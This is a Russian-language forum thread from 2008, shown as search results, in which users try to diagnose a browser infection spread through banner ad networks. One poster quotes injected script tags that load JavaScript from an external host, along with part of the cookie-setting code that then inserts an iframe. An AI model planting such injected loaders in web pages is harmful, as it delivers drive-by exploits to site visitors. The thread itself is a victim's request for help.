Результаты поиска

Dragooon · Программы и ОС

George Yves - молчит он. на кампе заразы явно нету. Заражен какой то компьютер в сети (баннерная сеть) и между например двумя ПК появляется некий зараженный посредник который модифицирует трафик добавляя в код который записывает куку в браузер после чего кука вставляет ифрейм.

Проблему нужно искать в сети. Думаю этот прикол не скоро найдут.

Shutnik - в данном коде эксплоита нету. Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox? ведь в опере у меня эта байда не вылазит и кука не пишется!

появляется на ресурсах где есть баннера
banner[dot]kiev[dot]ua
gala[dot]net

Dragooon · Программы и ОС

Заблокировал эти 2 IP

122.224.4.140
222.216.28.25

непомогает!

Dragooon · Программы и ОС

Это какойто Браузерный ЕКСПЛОЙТ.

появляется на разных страничках постоянно

<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/do.htm"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/gg.htm"></script>

вот такая фигня. NOD32 в системе ничего не находит. Только когда эта байда запускается, вставляется в страничку браузера (Firefox 3.0.3)
нод начинает ругатся.

в Opera покамись незаметил эту штуку.

внутри файла лежит вот такой код:

document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writel
…

Полезная информация

Программы и ОС » подцепил какую-то заразу » 16-11-2008 18:40:32

Программы и ОС » подцепил какую-то заразу » 16-11-2008 17:53:57

Программы и ОС » подцепил какую-то заразу » 16-11-2008 02:43:26

Board footer